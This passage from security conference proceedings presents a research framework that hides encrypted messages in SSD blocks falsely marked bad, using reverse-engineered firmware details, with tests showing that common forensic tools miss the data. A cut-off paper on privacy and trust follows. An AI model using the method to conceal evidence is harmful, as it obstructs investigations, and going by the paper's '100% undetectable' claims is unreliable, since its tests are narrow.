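            # Flash cannot overwrite in place: invalidate the old page.
            self.invalid.add(self.l2p[logical_addr])
        self.l2p[logical_addr] = self.next_free
        self.next_free += 1
        return self.l2p[logical_addr]

ftl = ToyFTL()
ftl.write(7)   # first write of LBA 7 -> physical page 0
ftl.write(7)   # rewrite -> physical page 1; page 0 becomes garbage
print(ftl.l2p[7], sorted(ftl.invalid))  # 1 [0]
```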
3. Page Size, Spare Bytes & Error Correction: Traditional HDDs implement storage based on a predefined
allocation unit called a sector, which is a power of two.
To facilitate the mapping of logical blocks to physical
flash memory, the flash memory is manufactured with
page sizes also being powers of two. However, since flash
memory is susceptible to data disturbances caused by
neighboring cells, it is critical for the FTL to implement
an error correction mechanism. To accommodate the storage requirements of the Error Correction Code (ECC),
the flash memory is manufactured with additional spare
bytes, in which FTL can store the ECC. For instance, a
flash memory page may consist of 8192 bytes with 448
additional bytes reserved for ECC.
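Using the 8192 + 448 example above, the split between data and spare bytes can be sketched as follows; the page geometry is the example's, not a universal constant:

```python
# Sketch: per-page layout with spare bytes reserved for ECC, using the
# 8192-byte-data / 448-byte-spare example from the text.

DATA_BYTES_PER_PAGE = 8192
SPARE_BYTES_PER_PAGE = 448

raw_page_size = DATA_BYTES_PER_PAGE + SPARE_BYTES_PER_PAGE
spare_overhead = SPARE_BYTES_PER_PAGE / DATA_BYTES_PER_PAGE

print(raw_page_size)                   # 8640 raw bytes per page
print(round(spare_overhead * 100, 2))  # ~5.47% ECC overhead
```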
4. Bad Blocks: Due to the physical characteristics of the
flash memory as well as cell degradation over time, flash
memory packages may ship with blocks that are incapable
of reliably storing data, even with an ECC employed.
These blocks are tested at the factory and marked in a
specific location within the block to identify them as initial
bad blocks. During SSD manufacturing, the flash memory
is scanned for bad block markings and an initial bad block
list is stored for use by the FTL. Beyond this initial list of
bad blocks, the FTL must keep the list updated with the
inclusion of newly identified bad blocks at runtime.
5. Over-Provisioning: Write amplification, a serious
concern with SSDs, is an inevitable circumstance where the
actual amount of physical information written is greater
than the amount of logical information requested to be
written. On SSDs, this occurs for several reasons, including
but not limited to: need for ECC storage, garbage collection, and random writes to logical blocks. In order to
maintain responsiveness when the drive is near capacity
and longevity when flash memory cells begin to fail, SSDs
may be manufactured with more flash memory than they
are advertised with, a concept known as over-provisioning.
For example, an SSD containing 128 GB of flash memory
may be advertised as 100 GB, 120 GB, or 128 GB, corresponding
to 28%, 6.67%, or 0% over-provisioning, respectively.
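The percentages in this example follow from the usual definition of over-provisioning, (physical − advertised) / advertised, sketched below:

```python
# Sketch: over-provisioning as (physical - advertised) / advertised
# capacity, reproducing the 128 GB example from the text.

def over_provisioning(physical_gb, advertised_gb):
    return (physical_gb - advertised_gb) / advertised_gb

for advertised in (100, 120, 128):
    pct = over_provisioning(128, advertised) * 100
    print(f"{advertised} GB advertised -> {pct:.2f}% over-provisioning")
```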
B. OpenSSD
The OpenSSD Project [17] was created by
Sungkyunkwan University in Suwon, South Korea in
collaboration with Indilinx, to promote research and
education on SSD technology. This project provides
the firmware source code for the Indilinx Barefoot
Controller used by several commercial SSD manufacturers
including OCZ, Corsair, Mushkin, and Runcore IV. The
firmware code provided in this project is an open-source
implementation, and a research implementation of a
complete SSD, known as the Jasmine Board, is available
for purchase.
Table I summarizes the specifications of the reference
SSD. During the course of our research, we learned that the
Jasmine Board uses the same Indilinx Barefoot controller
firmware as our reference SSD, which is an OCZ Vertex
Series SATA II. We also learned that the firmware installation
method used by the OCZ Vertex SSD and the Jasmine Board
involved setting a jumper on the SSD to enable a factory
or engineering mode. Upon
setting the jumper on the reference SSD and compiling
and running the firmware installation program adapted
from the OpenSSD Project, we were able to connect to
the SSD in factory mode with physical access to NAND
flash memory chips, bypassing the FTL.
IV. Framework Design Choices
We have successfully identified the following critical
pieces of information about firmware functionalities from
the OpenSSD code through reverse engineering, information
which was otherwise not available in the OpenSSD
documentation:
• Block-0 of each flash memory package is erased
and programmed during the firmware installation process.
• The first page of block-0 contains an initial bad block
list before the firmware installation, which will be
read by the installer, erased along with the remainder
of block-0, and programmed with identical
information as part of the installation process.
• In addition to page-0, a minimal set of metadata
such as the firmware version and image size is programmed
into pages-1 through 3, and the firmware
image itself is programmed into sequential pages
starting with page-4.
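The recovered block-0 layout can be summarized in a small classification sketch; the mapping below restates the text's description, and is not the firmware's actual on-flash encoding:

```python
# Illustrative sketch of the recovered block-0 layout: page-0 holds the
# initial bad block list, pages 1-3 hold firmware metadata, and the
# firmware image occupies sequential pages starting at page-4.

def region_of(page_index):
    """Classify a page of block-0 by the layout described in the text."""
    if page_index == 0:
        return "initial bad block list"
    if 1 <= page_index <= 3:
        return "firmware metadata (version, image size, ...)"
    return "firmware image"

print(region_of(0))   # initial bad block list
print(region_of(2))   # firmware metadata (version, image size, ...)
print(region_of(10))  # firmware image
```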
Based on our analysis of the firmware, we came up with
the following storage covert channels that can be used in
designing our IH framework:
1) Manipulating the FTL data structure: We considered
the possibility of modifying the firmware and utilizing it
for IH. One possibility was to redesign the wear leveling
algorithm such that some blocks will never be considered
for allocation.
2) Utilizing the spare bytes: The spare bytes available
per page are not completely used; some are used for
storing ECC. Thus, the remaining spare bytes can be
used for IH.
3) Using the blank pages in block zero: Only a few
pages of block zero are used during firmware installation;
the remaining pages are free for IH.
4) Manipulating the initial bad block list: Inserting
new bad blocks into the bad block list in block zero,
and using them for IH.
With due diligence, we decided against the first three
methods because OpenSSD's implementation is a stripped-down
version of the actual firmware. This means the
full-blown version of the firmware could easily overwrite
any modifications we make to the FTL data structure.
Therefore, the first method is not very useful. Though the
unused spare bytes can be used, it was uncertain whether
or not the firmware would use them during the life of the
SSD. Hence, the second method was decided against. As
for the blank pages on block 0, they did not provide much
room for hiding information, so the third method was
ruled out. Finally, we narrowed down our choice to
one stable and robust method – manipulation of the initial
bad block list, details of which follow in the next section.
Fig. 2. Flow chart illustrating the initial system design.
V. Information Hiding Framework
A. Process Overview
Scenario: Alice and Bob could be friends or total
strangers communicating over an insecure channel. Their
goal is to exchange secret messages over the insecure
channel in the presence of Eve, the adversary. As noted
in Section I-A, we will not discuss the details of key
negotiation as plenty of known works exist on this subject.
For simplicity, we assume the use of PKI in our discussions.
Step-1: Alice has the secret message $M_{sec}$ she wishes to
share with Bob.
Step-2: She generates a random session key $K_{rand}^{Alice}$
that she inputs to the Hiding Algorithm along with $M_{sec}$.
Step-3: $M_{sec}$ is encrypted with $K_{rand}^{Alice}$, generating the
following message:

$E[M_{sec}]_{K_{rand}^{Alice}}$   (1)

This message is then written into fake bad blocks.
Simultaneously, a map-file $F_{map}$ is generated. The purpose
of $F_{map}$ is identifying the blocks holding the secret message.
Step-4: Alice then encrypts $F_{map}$ and $K_{rand}^{Alice}$ with her
private key $K_{prv}^{Alice}$, generating the following message. This
is necessary to provide Bob with a message integrity
verification service.

$M_{sec}^{verify} = E[F_{map} \| K_{rand}^{Alice}]_{K_{prv}^{Alice}}$   (2)

She then encrypts the $M_{sec}^{verify}$ message with Bob's
public key $K_{pub}^{Bob}$, generating the following message.

$confM_{sec}^{verify} = E[(F_{map}) \| (K_{rand}^{Alice})]_{K_{pub}^{Bob}}$   (3)
1: file ⇐ user input secret message
2: blocksRequired = sizeOf(file) / sizeOf(block)
3: leastBadBlockBank = 0
4: for i = 0 to bank.count do
5:   if (i.badBlocksEraseCount < leastBadBlockBank.badBlocksEraseCount) then
6:     leastBadBlockBank = i
7:   end if
8: end for
9: while (leastBadBlockBank.blocksinbadBlockList) && (leastBadBlockBank.blocks.metadata == keyword) && (count < blocksRequired) do
10:   newBadBlock.count = leastBadBlockBank.block
11:   count++
12: end while
13: Payload = Encrypt(metadata, file)
14: payload.Write()
15: newKey = encode(leastBadBlockBank, newBadBlock)
Fig. 3. Algorithm for Hiding
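The bank-selection step of Figure 3 can be restated in runnable form; the data structures here (per-bank cumulative erase counts and per-bank false-bad-block lists) are stand-ins for the firmware state, not the actual OpenSSD structures:

```python
# Runnable restatement of the selection step in Fig. 3: pick the bank whose
# false bad blocks have the smallest cumulative erase count, then take as
# many of its marked blocks as the file needs. Firmware state is mocked.
import math

def pick_blocks(file_size, block_size, bank_erase_counts, bank_bad_blocks):
    blocks_required = math.ceil(file_size / block_size)
    # Fig. 3, lines 3-8: find the least-worn bank.
    least = min(range(len(bank_erase_counts)),
                key=bank_erase_counts.__getitem__)
    # Fig. 3, lines 9-12: gather blocks from that bank's false bad blocks.
    chosen = bank_bad_blocks[least][:blocks_required]
    return least, chosen

bank, blocks = pick_blocks(file_size=1_500_000, block_size=524_288,
                           bank_erase_counts=[5, 2, 9],
                           bank_bad_blocks=[[11, 12, 13],
                                            [40, 41, 42, 43], [7]])
print(bank, blocks)  # 1 [40, 41, 42]
```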
The message $confM_{sec}^{verify}$ encrypted with Bob's public
key provides the confidentiality service for the message exchange.
Note that the use of encryption keys in this specific order
also provides communication endpoint anonymity.
Step-5: Alice sends $confM_{sec}^{verify}$ to Bob. On receiving this
message, Bob uses his private key $K_{prv}^{Bob}$ to decrypt the
message, extracting $M_{sec}^{verify}$. Then, Bob uses $K_{pub}^{Alice}$ to
extract $F_{map}$ and $K_{rand}^{Alice}$. Note that Alice and Bob
could use either a client-server or P2P architecture to
eliminate the need for physical access to the SSD.
Steps-6 & 7: Bob extracts $F_{map}$ and $K_{rand}^{Alice}$. He inputs
$F_{map}$ to the Retrieving algorithm, presented in Figure 4,
which applies it to the SSD to retrieve and reconstruct the
encrypted secret message $E[M_{sec}]_{K_{rand}^{Alice}}$.
Steps-8 & 9: Bob uses $K_{rand}^{Alice}$ to decrypt $E[M_{sec}]_{K_{rand}^{Alice}}$
and finally extracts the secret message $M_{sec}$.
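The nesting of keys in Steps 1–9 can be illustrated end-to-end with toy primitives. XOR with a repeated key stands in for both the symmetric and the public-key operations, purely to make the wrapping order concrete; nothing here is cryptographically secure:

```python
# Toy end-to-end sketch of Steps 1-9. XOR stands in for real ECC
# encryption/signatures, only to show the wrapping order:
# session key -> Alice's private key -> Bob's public key.
import os

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

msg = b"secret message M_sec"
k_rand = os.urandom(16)             # Step-2: Alice's random session key
alice_priv = alice_pub = b"A" * 16  # toy keypair: same key both ways
bob_priv = bob_pub = b"B" * 16

hidden = xor(msg, k_rand)              # Step-3: E[M_sec], to fake bad blocks
f_map = b"bank=1;blocks=40,41,42"      # map-file from the hiding step
m_verify = xor(f_map + b"||" + k_rand, alice_priv)  # Step-4: eq. (2)
conf_m = xor(m_verify, bob_pub)                     # Step-4: eq. (3)

# Steps-5..9 on Bob's side: unwrap in reverse order.
inner = xor(xor(conf_m, bob_priv), alice_pub)
recovered_map, recovered_key = inner.split(b"||", 1)
print(xor(hidden, recovered_key) == msg)  # True
```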
B. Initial Design
In the first phase of our research, we modified the
OpenSSD framework to our specific requirements and
tried to hide a test file. As illustrated in the flowchart
in Figure 2, we designed a simple tool with a command
line interface that receives a filename as input from the user.
Subsequently, the tool decides the number of bad blocks
to be allocated for hiding that file based on the file size.
Finally, the tool chooses a random bank on the SSD and
allocates the required number of blocks. While allocating
the blocks, we made sure that the blocks are not part of
the initial bad block list the SSD was shipped with. If
the allocation is successful, the tool copies the file to the
specified blocks and creates the map-file (used to identify
the bank and blocks), which is later used for the retrieval process.
C. Challenges with the Initial Design
In this section, we address some of the challenges we
faced with the initial design of our IH framework.
1: map-file ⇐ file received from sender
2: bankAndBlock = decode(map-file)
3: metadata = bankAndBlock.Read()
4: decrypt(metadata)
5: decrypt(file.Read())
6: file.Write()
7: if (ReadandErase) then
8:   Erase(bankAndBlock)
9:   eraseCount++
10:   eraseCount.Write()
11: end if
Fig. 4. Algorithm for Retrieving
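The erase-and-retrieve branch of Figure 4 can be sketched with mocked state; incrementing the stored erase count on erase is what later steers the hiding algorithm toward less-worn blocks. The byte layout mirrors Table IV (byte 0 = erase count, rest = hidden data) and is a stand-in, not firmware code:

```python
# Sketch of Fig. 4's optional erase path: after the hidden file is read
# back, the block is erased and its first-byte erase count incremented,
# mirroring the Table IV layout. State is a mocked bytearray.

def retrieve(block: bytearray, read_and_erase: bool) -> bytes:
    erase_count, data = block[0], bytes(block[1:])
    if read_and_erase:
        # "Erase" the block to all-ones flash state, bump the count.
        block[:] = bytes([erase_count + 1]) + b"\xff" * (len(block) - 1)
    return data

blk = bytearray([3]) + bytearray(b"hidden payload")
payload = retrieve(blk, read_and_erase=True)
print(payload, blk[0])  # b'hidden payload' 4
```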
1) As the number of bad blocks increases, firmware
installation fails, rendering the drive useless.
2) If we hide data in blocks that hold the firmware,
then firmware reinstallation would rewrite these
blocks, irrespective of their inclusion in the bad
block list.
3) As part of our experiments, we took a complete physical
image of the drive, including the bad blocks, and
found that the hidden file's signature was
visible along with the metadata.
4) Every time we added a new bad block and hid
data, we had to reinstall the firmware. This was
required because the firmware would only keep
track of the bad blocks that were in the list when
the firmware was installed.
D. Enhanced Design
We shall now discuss our enhanced design, with improvements
to overcome the challenges of the initial design
as delineated above.
• Uninstall the SSD firmware.
• Enable the user to specify the banks on which bad
blocks have to be assigned and the number of bad
blocks to be allocated on each bank.
• Have the tool allocate the user-specified number
of blocks on user-specified banks and append these
blocks to the bad block list maintained by the FTL.
• Reinstall the firmware on the SSD.
• Add metadata to user-created bad blocks to distinguish
them from firmware-identified bad blocks. In
our prototype implementation of the IH framework
on the reference SSD, we reserve the very first
byte of user-specified bad blocks to keep track
of the block's erase count, which serves as the metadata.
The erase count variable is initialized to 0 and is
incremented every time new data is written to the
corresponding block, since a write operation on an
SSD is preceded by an erase operation.
Note that, as shown in Table IV, the first byte is the
erase count, which is followed by the data. This helps us
select the least-erased block every time we pick a block for
hiding, and to make sure the block is empty.
As can be seen in Figure 3, we pick blocks from banks
that have the least erase count. We achieve this by
keeping track of the cumulative erase count, comparing
the cumulative erase counts of all the bad blocks in the
banks, and finally picking the bank with the least value. Next,
in order to address the firmware overwrite problem, we
excluded the first 32 blocks in every bank (this was done
during the pre-allocation of bad blocks). Finally, in
order to escape physical imaging, we encrypt both the
metadata and the file. While retrieving the file, the user is
given the option to either erase and retrieve the file or just
retrieve it. If the user chooses to erase and retrieve, we erase
the block and increase its erase count by one, so that the
block is not used again until all the other bad blocks have
reached a similar erase count.

TABLE II. Information retrieval under different scenarios.
Condition | Hidden File Retrieved
Firmware Reinstallation | Yes
NTFS Formatted Drive | Yes
Partitioned Drive | Yes
Populate Disk to Full Capacity | Yes
Factory Mode Erase | No
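The pre-allocation filters just described (skip the first 32 firmware-owned blocks of every bank, then prefer the least-erased candidates) can be sketched as follows; candidate blocks are mocked as (index, erase count) pairs:

```python
# Sketch of the enhanced design's pre-allocation filters: exclude the
# first 32 blocks of each bank (reserved for firmware), then order the
# remaining candidates by stored erase count, least-erased first.

RESERVED_BLOCKS = 32  # firmware-owned blocks at the start of each bank

def eligible_blocks(candidates):
    """candidates: list of (block_index, erase_count) pairs for one bank."""
    usable = [c for c in candidates if c[0] >= RESERVED_BLOCKS]
    return sorted(usable, key=lambda c: c[1])  # least-erased first

cands = [(5, 0), (40, 3), (77, 1), (31, 0), (90, 2)]
print(eligible_blocks(cands))  # [(77, 1), (90, 2), (40, 3)]
```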
VI. Evaluation of Enhanced Design
We confirm through evaluations that our framework is
100% undetectable and robust to firmware updates.
Experiment-1: We test the conditions under which the
secret message is retained and retrievable. Table II summarizes the different scenarios under which we evaluated our
framework on the reference SSD. As can be seen, we were
able to retrieve the secret message in every scenario except
when erased in the factory mode. However, this operation
requires access to the SSD in factory mode as well as
knowledge of factory commands specific to the firmware
in use, without which it is impossible to wipe the physical
memory of the SSD.
Experiment-2: With this experiment, our objective was
to determine the maximum number of blocks that can be
tagged as bad, both firmware-detected and user-specified,
before the firmware installation starts to fail. This would
give us the total amount of data that can be hidden safely,
using our IH framework, without causing drive failure.
We also wanted to know if hiding data would result in
any changes, as perceivable by a normal user. For this,
we gradually increased the bad block count in each bank,
in increments of 10. With every increment, we did the
following: 1) increment the counter tracking the bank's
bad block count; 2) re-install the firmware; 3) install
the file system on top of the firmware; and 4) check the
available logical disk space. During the experiments, we
determined that the threshold for the number of blocks
that can be tagged as bad, as a fraction of the total number
of blocks per bank, is approximately 2.6%, equivalent to
218 blocks per bank. Beyond this threshold, the firmware
installation fails. We have summarized the results in
Table III. Furthermore, based on the results, we conclude
that bad block management is part of over-provisioning;
hence, a typical user will not notice any changes to the
logical structure of the disk when information is hidden,
proving that our system is 100% imperceptible to end users.
Experiment-3: Finally, we wanted to test if any of the existing computer forensic tools would be able to discover the
TABLE III. Drive size with different bad block counts.
Bad Block Count | Drive Size
25 | 29.7 GB
50 | 29.7 GB
75 | 29.7 GB
100 | 29.7 GB
109 | 29.7 GB
secret messages hidden on an SSD using our IH framework.
We used freeware tools such as WinHex and FTK Imager.
Both tools, though very popular and powerful, were
unable to get past the logical disk. We confidently
conclude that none of the existing computer forensics tools,
at the time of this writing and to the best of our knowledge,
have the capability to access the physical layer of an SSD.
TABLE IV. Manipulated bad block layout.
Number of Bytes | Information
1 | Erase Count
Remaining bytes | Hidden data
A. Defense against attacks
In Section I-A, we presented four possible attacks that
an adversary, Eve, can potentially try against our IH
framework. We shall discuss why none of these attacks will
be successful against our IH framework.
• Attack-1 Defense: The hidden information is not
part of the logical drive. Hence, Eve will not benefit
from a logical image of the DeadDrop SSD.
• Attack-2 Defense: SSD blocks that are tracked
as bad blocks by the FTL firmware are never
accessed or erased by the firmware. Hence, this
attack will not be successful.
• Attack-3 Defense: Currently, it is impossible for
Eve to make a physical image of the SSD without
our modified OpenSSD software. Additionally, Eve
would need the ability to access the SSD in
factory mode with the appropriate jumper settings,
and would need to know the firmware functionalities that
we have identified beyond those provided in the
OpenSSD documentation. Beyond this, she would
still need the random session key generated by
Alice that was used to encrypt the secret message.
She would also need Bob's (the map-file recipient's)
private key to decrypt the random
session key and the map-file, without which the
secret message cannot be reconstructed. Therefore,
the feasibility of this attack can be safely ruled out.
• Attack-4 Defense: Assuming Eve is able to sniff
the map-file from the traffic between Alice and
Bob, as discussed in Section V, she still needs Bob's
private key to decrypt the map-file. Bob's private
key, however, is not accessible to anyone other than
Bob himself. Hence, this attack is ruled out.
VII. Conclusion and Future Work
In this paper, we have presented the design, algorithms,
and implementation details of a secure and robust
IH framework that can hide information on SSDs at the
physical layer. We have presented multiple methods for IH
highlighting their strengths and weaknesses. Finally, we
have evaluated the proposed framework through real world
implementations on a reference SSD running Indilinx’s
Barefoot flash controller, which is used by various SSD
manufacturers including Corsair, Mushkin, and Runcore
IV [18]. Consequently, this IH framework can be used
on SSDs from different manufacturers, making it quite
pervasive and ubiquitous.
The ability to interface SSDs with the OpenSSD platform and bypass the FTL has significant impact on the
Digital Forensics community. It is also the first step toward
potential antiforensics techniques. Having discovered
this possibility, law enforcement agencies can now focus
on potential information theft and antiforensics attacks
on SSDs, which were otherwise deemed near impossible.
As part of our future work, we would like to investigate
the potential of integrating support for other popular
proprietary firmware. This will enable us to expand the
existing project to support forensic investigation of SSDs
from a wide array of manufacturers.
Acknowledgment
The authors would like to thank the Defense Cyber
Crime Centre, Linthicum, Maryland, USA, for the reference SSD drive used in the experiments.
References
[1] C. K. Wee, "Analysis of hidden data in NTFS file system," 2013, URL: http://www.forensicfocus.com/hidden-data-analysis-ntfs [accessed: 2013-04-25].
[2] "DeadDrop," 2014, URL: http://en.wikipedia.org/wiki/Dead_drop [accessed: 2014-07-26].
[3] L. Hutchinson, "Solid-state revolution: in-depth on how SSDs really work," 2014, URL: http://arstechnica.com/information-technology/2012/06/inside-the-ssd-revolution-how-solid-state-disks-really-work/2/ [accessed: 2014-07-25].
[4] G. B. Bell and R. Boddington, "Solid state drives: the beginning of the end for current practice in digital forensic recovery?" vol. 5, no. 3, Association of Digital Forensics, Security and Law, 2010, pp. 1-20.
[5] C. King and T. Vidas, "Empirical analysis of solid state disk data retention when used with contemporary operating systems," vol. 8, Elsevier, 2011, pp. S111-S117.
[6] Y. Rebahi, J. J. Pallares, N. T. Minh, S. Ehlert, G. Kovacs, and D. Sisalem, "Performance analysis of identity management in the session initiation protocol (SIP)," in Computer Systems and Applications, AICCSA 2008, IEEE/ACS International Conference on. IEEE, 2008, pp. 711-717.
[7] E. Huebner, D. Bem, and C. K. Wee, "Data hiding in the NTFS file system," vol. 3, 2006, pp. 211-226.
[8] D. Verhasselt, "Hide data in bad blocks," 2009, URL: http://www.davidverhasselt.com/2009/04/22/hide-data-in-bad-blocks/ [accessed: 2009-04-22].
[9] A. D. McDonald and M. G. Kuhn, "StegFS: A steganographic file system for Linux," in Information Hiding. Springer, 2000, pp. 463-477.
[10] Grugq, "The art of defiling: Defeating forensic analysis on Unix file systems," Black Hat Conference, 2005.
[11] I. Thompson and M. Monroe, "FragFS: An advanced data hiding technique," 2004, URL: http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Thompson/BH-Fed06-Thompson-up.pdf [accessed: 2014-06-02].
[12] H. Khan, M. Javed, S. A. Khayam, and F. Mirza, "Designing a cluster-based covert channel to evade disk investigation and forensics," vol. 30, no. 1, Elsevier, 2011, pp. 35-49.
74
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Saving Privacy in Trust-Based User-Centric Distributed Systems
Alessandro Aldini
Dipartimento di Scienze di Base e Fondamenti
University of Urbino “Carlo Bo”
Urbino, Italy
Email: alessandro.aldini@uniurb.it
Abstract—User-centricity is a design philosophy subsuming new
models of Internet connectivity and resource sharing, whose
development is mainly driven by what users offer and require.
To promote user-centric services and collaborative behaviors,
incentives are needed that are typically based on trust relations
and remuneration. In this paper, we show that privacy-preserving
mechanisms can favor user’s involvement if privacy can be traded
with trust and cost. In particular, we present and evaluate
formally a model ensuring an adequate level of flexibility among
privacy, trust, and cost in the setting of distributed systems.
Keywords–Cooperation incentives; trust; privacy; remuneration;
user-centric networks; model checking.
I. INTRODUCTION
Nowadays, user-driven services, like personal hotspot and
peer-to-peer, are playing a fundamental role in the reshaping
of the Internet value chain [1]. Essentially, they focus on the
user experience, related needs, expectations, and attitude to
cooperation. One of the key factors behind the success of
community-scale user-centric initiatives is given by the user
involvement as a prosumer, i.e., an actor combining the roles
of service producer and consumer. Such an involvement must
be strengthened through the adoption of incentive mechanisms
stimulating the willingness to collaborate. In particular, even
if cooperation is a natural consequence of sense of community
and synergy, it cannot be taken for granted because of typical
obstacles like, e.g., selfishness and, even worse, cheating,
which represent a threat keeping users from trusting other
community members.
Establishing trust relations among users is the objective of
explicit trust and reputation systems, among which we concentrate on those aiming at providing computational estimations
of user’s trustworthiness as perceived by the community [2].
Basically, these estimations work effectively as an incentive
to collaborate if they represent parameters influencing access
to services at favorable conditions, among which we include
the service cost as one of the most important aspects affecting the perceived quality of experience. At the same time,
remuneration is another kind of incentive used to stimulate
cooperation [3]. Whenever combined with trust, it enables a
virtuous circle for the proliferation of user-centric services.
Trust is a concept that may involve and justify the collection of personally identifiable sensitive information, which in many real situations contrasts dramatically with the idea of privacy and acts as a deterrent when users get involved in interactions. In particular, the lower the attitude to expose sensitive information is, the higher the probability of being
untrusted when negotiating a service. Trading privacy for trust is thus a way of balancing the subjective value of what is revealed in exchange for what is obtained.
The above considerations suggest that an efficient cooperation infrastructure depends on the tradeoff among trust, privacy, and cost. As shown recently [4], these three dimensions can be balanced in order to favor collaborative behaviors depending on specific user needs in terms of social requirements (e.g., personal sensitivity to trust and privacy issues) and economic requirements (e.g., the costs that can be afforded). More
precisely, in the model proposed in [4], a balanced tradeoff
is guaranteed by a centralized system in which reputation is
managed by a trusted third party (TTP) collecting information
about every transaction completed, while keeping the desired
level of privacy for every user involved. In this paper, we
provide a twofold contribution. On one hand, we show how
to implement the model of [4] in the setting of distributed
systems that cannot rely on TTP. On the other hand, we
validate formally such a model through model checking based
analysis [5]. This validation is done in the setting of a cooperation system that has been recently proposed to implement
trust and remuneration based incentive mechanisms [6].
In the rest of this section, we comment on related work.
In Section II, we briefly recall the model of [4] and then
we illustrate a distributed solution for its implementation. In
Section III, we estimate the validity of such a model in the setting of a real-world case study. Finally, Section IV concludes the paper.
A. Related Work
Making trust and service cost mutually dependent is a winning strategy if the aim is to stimulate honest behaviors while keeping users from cheating and selfishness [6]–[8], as also proved by means of formal methods, like game theory and model checking [9]–[13].
The contrast between privacy and trust is investigated
in [14], where it is shown that these two aspects can be
traded by employing a mechanism based on pseudonyms. In practice, users freely create pseudonyms identified by the so-called crypto-id, i.e., the hash of the public key of a locally generated asymmetric key pair. Then, in different environments, a user can use different pseudonyms to carry out actions logged as events signed with the private key of the chosen pseudonym. If needed to acquire more reputation, several pseudonyms can be linked together in order to augment the number of known actions and potentially increase the trust
in the linked entity. Notice that in approaches such as this one the link is irrevocable.
Incentive mechanisms are proposed in [15] to achieve a
balanced tradeoff between privacy and trust in the setting of
data-centric ad-hoc networks. In [16], such an interplay is
formulated as an optimization problem in which both privacy
and trust are expressed as metrics. In [17], trust towards
an entity is used to take decisions about the amount of
sensitive information to reveal to the entity. Further works on
unlinkability [18] and pseudonymity [19] [20] provide insights
on the tradeoff between privacy and trust.
With respect to previous work, the novelty of the approach
proposed in [4] is twofold. On one hand, the analysis of the
tradeoff between privacy and trust takes into account also the
service cost. On the other hand, it overcomes the limitations of
the existing approaches, in which sensitive information linking
is irrevocable and the privacy disclosure is incremental.
II.
A M ODEL FOR I NDEPENDENT R ELEASE OF P RIVACY
In a classical view of privacy, a user exposes (part of)
personal information in order to be trusted enough to get access
to the service of interest. In other words, privacy disclosure is
traded for the amount of reputation that the user may need
to be considered as a trustworthy partner in some kind of
negotiation in which, e.g., service cost may depend on trust.
Typically, once different pieces of sensitive information (e.g.,
credentials, virtual identities, or simply the proof of being the
user involved in a transaction previously conducted), say I1
and I2 , are linked and exposed to be trusted by someone else,
then such a link is irrevocably released. In this sense, we say
that the disclosure of sensitive information is incremental along
time.
In order to exemplify, as discussed in [14], I1 and I2
may identify two different transactions conducted by the user
under two different pseudonyms, each one revealing different
personal information about her. The user is obviously able to
show that both I1 and I2 are associated with the same user
and, if such a proof is provided, I1 and I2 become irrevocably linked together. In contrast to this scenario, in [4] an
alternative, independent model of privacy release is proposed
in which the link is not definitive. In order to work properly,
such a model requires some form of uncertainty associated
with the owners of specific actions. Basically, this is obtained
by sharing pseudonyms among different users. Similarly as
in [14], a virtual identity is represented by a crypto-id, which
can be calculated using the SHA-3 cryptographic hash function
over the public key of the user. Then, the basic idea of
the independent model of privacy release is that trust and
transactions are mapped to pieces of the crypto-id rather than
to the crypto-id as a whole.
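As a concrete illustration, deriving a crypto-id from a public key is a single hash invocation. The sketch below assumes the 256-bit SHA-3 variant; the byte string standing in for the public key is purely a placeholder:

```python
import hashlib

# Sketch: a crypto-id as the SHA-3 digest of a public key.
# The byte string below is a placeholder, not a real key.
public_key = b"-----BEGIN PUBLIC KEY----- ..."
crypto_id = hashlib.sha3_256(public_key).digest()

print(len(crypto_id))  # 32 bytes, i.e., a 256-bit crypto-id
```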
Let us explain such a mechanism through a typical handshake between Alice, who issues a service request, and Bob, who offers the service. Instead of revealing that she is Alice, she accompanies the request with a portion of her crypto-id, identified by applying a bitmask to the crypto-id through the bitwise AND operation. For the sake of presentation, consider an 8-bit crypto-id, e.g., 10010101, from which we obtain the portion 00010000, called a chunk, when applying the bitmask 00010010. Hence, a chunk is a subset of bits of the crypto-id of which we know both value and position. The number and positions of the 1 bits in the bitmask are under Alice's control.
The transaction is then identified by the chunk chosen by Alice, together with the proof (which can be validated in zero knowledge) of being a proper owner of the exposed chunk. Therefore, a trust value (and the related variation due to the feedback following the transaction execution) is not associated with Alice directly, but is related to the chunk of bits extracted from Alice's crypto-id through the chosen bitmask. In general, the same chunk is potentially shared by other crypto-ids belonging to several different users. In future interactions, Alice may select other chunks of her crypto-id. Moreover, she can also spend a set of different chunks of the crypto-id in order to exploit a combination of the trust levels associated with each of these chunks. Ideally, the overall trust associated with a crypto-id shall result from a combination of the trust values accumulated by every chunk of such a crypto-id spent in previous interactions. Thanks to the uncertainty relating chunks and their owners, every time Alice exposes a chunk to Bob in order to negotiate a transaction, Bob cannot link the current transaction to any of the previous transactions conducted (by Alice or by other users) using the same chunk (or a portion of the current one).
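The extraction step of the handshake above can be sketched directly, using the 8-bit values of the running example:

```python
def chunk(crypto_id: int, bitmask: int) -> int:
    """Extract a chunk: the bitwise AND of crypto-id and bitmask."""
    return crypto_id & bitmask

# Running example: crypto-id 10010101 with bitmask 00010010
print(format(chunk(0b10010101, 0b00010010), "08b"))  # 00010000
```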
While in [4] the model above relies on the presence of a TTP managing chunks' reputation, in the following we tackle the problem of implementing the same idea in the setting of distributed systems without a central authority and without any prior knowledge about crypto-ids, which represents a more realistic scenario in several user-centric networks.
A. Design for Distributed Systems
Handling trust towards users by tracing the usage of
(possibly shared) chunks is a hard task in the absence of a
centralized reputation system. To deal with this problem, in
order to estimate user’s trustworthiness we define a local trust
structure that allows any user offering a service to associate a
trust value with every chunk received to negotiate the service.
Let C be the set of chunks with which the user has
interacted in completed transactions and T be the trust domain,
which we assume to be numeric and totally ordered. Chunks
are ranged over by C, C ′ , . . .. Sometimes, we use the notation
CB to define a chunk identified by bitmask B and CB [i] (resp.,
B[i]) to denote the value of the i-th bit of the chunk (resp.,
bitmask). Set C forms a partially ordered set (poset, for short),
(C, ≤), where the refinement operator ≤ is defined as follows.
Definition 1 (Chunk refinement): Let n be the crypto-id size. Given chunks CB and CB′, we say that CB′ refines CB, denoted CB ≤ CB′, if and only if:
• for all 1 ≤ i ≤ n: B[i] ≤ B′[i];
• for all 1 ≤ i ≤ n: if B[i] = 1, then CB[i] = CB′[i].
Notice that if CB ≤ CB ′ then B is a submask of B ′ and the
